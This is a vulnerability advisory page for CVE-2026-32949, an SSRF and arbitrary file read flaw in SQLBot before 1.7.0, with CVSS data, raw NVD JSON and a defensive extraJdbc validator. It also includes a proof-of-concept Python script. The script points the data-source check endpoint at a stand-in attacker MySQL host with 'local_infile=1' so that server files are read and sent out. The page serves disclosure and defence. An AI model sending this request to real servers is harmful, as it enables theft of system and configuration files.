Security Vulnerability Report
CVE-2026-32949 CVSS 7.5 HIGH

CVE-2026-32949

Published: 2026-03-20 05:16:14
Last Modified: 2026-03-23 17:35:17

Description

SQLBot is an intelligent data query system based on a large language model and RAG. Versions prior to 1.7.0 contain a Server-Side Request Forgery (SSRF) vulnerability that allows an attacker to retrieve arbitrary system and application files from the server. An attacker can exploit the /api/v1/datasource/check endpoint by configuring a forged MySQL data source with a malicious parameter extraJdbc="local_infile=1". When the SQLBot backend attempts to verify the connectivity of this data source, an attacker-controlled Rogue MySQL server issues a malicious LOAD DATA LOCAL INFILE command during the MySQL handshake. This forces the target server to read arbitrary files from its local filesystem (such as /etc/passwd or configuration files) and transmit the contents back to the attacker. This issue was fixed in version 1.7.0.
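One way to screen a user-supplied extraJdbc string before a connectivity check, given as an added example (it is not SQLBot's code and not the 1.7.0 patch). The function names, the allow-list contents and the PyMySQL-style `local_infile` keyword are assumptions of this example.

```python
from urllib.parse import parse_qsl

# Assumption: the only extra options this deployment needs (example allow-list).
ALLOWED_KEYS = {"charset", "connect_timeout", "read_timeout", "ssl_ca"}


def _pairs(extra):
    """Split on '&' or ';'; parse_qsl also percent-decodes keys and values."""
    return parse_qsl((extra or "").replace(";", "&"), keep_blank_values=True)


def _norm(key):
    """Fold case and separators so spelling variants of one option compare equal."""
    return key.strip().lower().replace("_", "").replace("-", "")


def audit_extra_params(extra):
    """Return reasons to reject an extraJdbc string (empty list means accept)."""
    findings = []
    for key, _value in _pairs(extra):
        if "localinfile" in _norm(key):
            # Matches local_infile (PyMySQL), allow_local_infile
            # (mysql-connector-python), allowLoadLocalInfile and
            # allowUrlInLocalInfile (Connector/J), allowLocalInfile (MariaDB).
            # Rejected whatever the value: the caller must not control it.
            findings.append(f"forbidden option {key!r}: server could request client files")
        elif key.strip().lower() not in ALLOWED_KEYS:
            findings.append(f"option {key!r} is not on the allow-list")
    return findings


def build_connect_kwargs(host, port, extra):
    """Build driver kwargs; raise on any finding and pin local_infile off."""
    findings = audit_extra_params(extra)
    if findings:
        raise ValueError("; ".join(findings))
    kwargs = {k.strip().lower(): v for k, v in _pairs(extra)}
    kwargs.update(host=host, port=port, local_infile=False)
    return kwargs
```

Filtering the option closes the file-read path only; the check endpoint still connects to a caller-chosen host, so limiting which hosts the backend may reach remains a separate control.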

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:fit2cloud:sqlbot:*:*:*:*:*:*:*:* - VULNERABLE
SQLBot < 1.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL of the vulnerable SQLBot instance
target_url = "http://vulnerable-sqlbot-host/api/v1/datasource/check"

# Attacker's controlled MySQL server address
attacker_mysql_host = "attacker-controlled-server.com"

# Payload to trigger the SSRF and file read
# The key is the 'extraJdbc' parameter enabling local_infile
payload = {
    "name": "exploit_ds",
    "host": attacker_mysql_host,
    "port": 3306,
    "username": "root",
    "password": "",
    "database": "test",
    "extraJdbc": "local_infile=1"
}

try:
    # Send the request to check the data source
    response = requests.post(target_url, json=payload)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] SQLBot is now connecting to the rogue MySQL server.")
        print("[+] Ensure your rogue server sends 'LOAD DATA LOCAL INFILE' during handshake.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32949", "sourceIdentifier": "[email protected]", "published": "2026-03-20T05:16:14.387", "lastModified": "2026-03-23T17:35:16.990", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQLBot is an intelligent data query system based on a large language model and RAG. Versions prior to 1.7.0 contain a Server-Side Request Forgery (SSRF) vulnerability that allows an attacker to retrieve arbitrary system and application files from the server. An attacker can exploit the /api/v1/datasource/check endpoint by configuring a forged MySQL data source with a malicious parameter extraJdbc=\"local_infile=1\". When the SQLBot backend attempts to verify the connectivity of this data source, an attacker-controlled Rogue MySQL server issues a malicious LOAD DATA LOCAL INFILE command during the MySQL handshake. This forces the target server to read arbitrary files from its local filesystem (such as /etc/passwd or configuration files) and transmit the contents back to the attacker. This issue was fixed in version 1.7.0."}, {"lang": "es", "value": "SQLBot es un sistema inteligente de consulta de datos basado en un modelo de lenguaje grande y RAG. Las versiones anteriores a la 1.7.0 contienen una vulnerabilidad de falsificación de petición del lado del servidor (SSRF) que permite a un atacante recuperar archivos arbitrarios del sistema y de la aplicación del servidor. Un atacante puede explotar el endpoint /api/v1/datasource/check configurando una fuente de datos MySQL falsificada con un parámetro malicioso extraJdbc='local_infile=1'. Cuando el backend de SQLBot intenta verificar la conectividad de esta fuente de datos, un servidor MySQL Rogue controlado por el atacante emite un comando LOAD DATA LOCAL INFILE malicioso durante el handshake de MySQL. 
Esto obliga al servidor objetivo a leer archivos arbitrarios de su sistema de archivos local (como /etc /passwd o archivos de configuración) y a transmitir el contenido de vuelta al atacante. Este problema fue solucionado en la versión 1.7.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": 
"HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-73"}, {"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fit2cloud:sqlbot:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.7.0", "matchCriteriaId": "2DFA6724-2EE1-4320-88E5-224E6C72E04D"}]}]}], "references": [{"url": "https://github.com/dataease/SQLBot/commit/ff98514827bad99b8fa4b39385adecc6e3d44355", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/dataease/SQLBot/releases/tag/v1.7.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/dataease/SQLBot/security/advisories/GHSA-wqj3-xcxf-j9m9", "source": "[email protected]", "tags": ["Exploit" ... (truncated)